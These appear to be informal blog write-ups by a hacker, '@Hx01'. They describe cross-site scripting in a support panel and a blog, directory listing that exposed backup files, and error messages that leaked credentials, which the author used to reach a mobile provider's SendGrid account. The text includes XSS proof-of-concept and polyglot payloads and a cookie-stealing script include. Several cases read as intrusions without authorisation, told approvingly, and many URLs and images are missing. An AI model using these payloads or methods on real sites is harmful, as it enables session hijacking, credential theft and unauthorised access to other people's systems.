hey folks! hope y'all great , i recently found a XSS in which lead  the attacker to takeover customer support panel :
Vulnerability : Cross Site Scripting Identifying Vulnerability : While i was facing a problem in Wd2 I goto know about , I opened a ticket for that ,and i got the idea of why not test it out for xss  i send the following payload  :
<script>alert("XSS POC BY HX01");</script> and boom!

Exploitation : since the webapp was vulnerable to xss i added an payload from  to steal the Admin Cookies,CSRF token etc :
"><script src=></script> now time to make the victim visit the url:

since some of the admin cookies were httponly i wasn't able to login into it but however due to xsshunter i was able to get the Ip,CSRF token(which could have lead to compromise agent)& some tickets information,some players id due to another xss trigger :
Reported the …


Vulnerabilities identified : XSS , IMPROPER ERROR HANDLING
hey folks! hope y'all are fine, i recently got access to a paki blog @mangobaazand here is the writeup how i was able to hack into.
INFORMATION GATHERING : while information gathering i came across to a website "" which was owned by mangobaaz and the signup page captured my antention so i selected it to peneterate.

IDENTIFYING VULNERABILITY : i added  the xss payload in the NAME Field : <script>alert("XSS BY HX01);</script> and BOOM! XSSED :

since i was trying to steal  cookies  i tried another payload  :

<iframe src=" jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e "></iframe> an xss didn't triggered but an error did:
since it was improper error handling it leaked some credentials :D including…

Directory Listing To Sensitive Files Exposure

Vulnerability : Directory Listing   since the website is priva8  and couldn't be disclose lets name it While surfing across a website i came to know that website was vulnerable to Directory Listing . since the website was using Wordpress as the cms i knew i couldn't find something else as it was already uptodate and didnt found anything interesting at : , i decided to enumerate the directories manually since i didn't had access to dirbuster at that time. i found out some dirs like,, and the fishy one " ". the included alot of images and three dirs "stores,shipments,voucher :
 nothing saucy was found in "" therefore i opened voucher and BOOM!  there were some backup files (not sure of it but were sensitive & left  public ) i.e *idh anyother screenshots as it was not ethical to* :
 and hence this…

Recon To Admin Creditionals Disclosure

Vulnerability : Information Leakage due to improper error handling
It all started with a cup of tea and curiosity to hack into my Mobile network Provider . I ussually start my recon with the firing google dorks and Sniper . since the name of that company can't be disclose lets substitute it as .

Firing this dork inurl: xyz i was able to get my target that web looklikes a VPBX portal for the marketing businesses  and call centers :

I tried Dirbuster but was not able to find anything and there were only default http & https ports were opened. since nothing else was left i tried giving a try to Request A Free Demo with fake details to avoid spam and BOOM! this error showed up : 
and this error leaked some creditionals  : 

TIME TO EXPLOIT : Since the DB was accessible through internal ip i wasn't able to exploit it however i got access to companies Sengrid Account which was enough :

Best Regards, @Hx01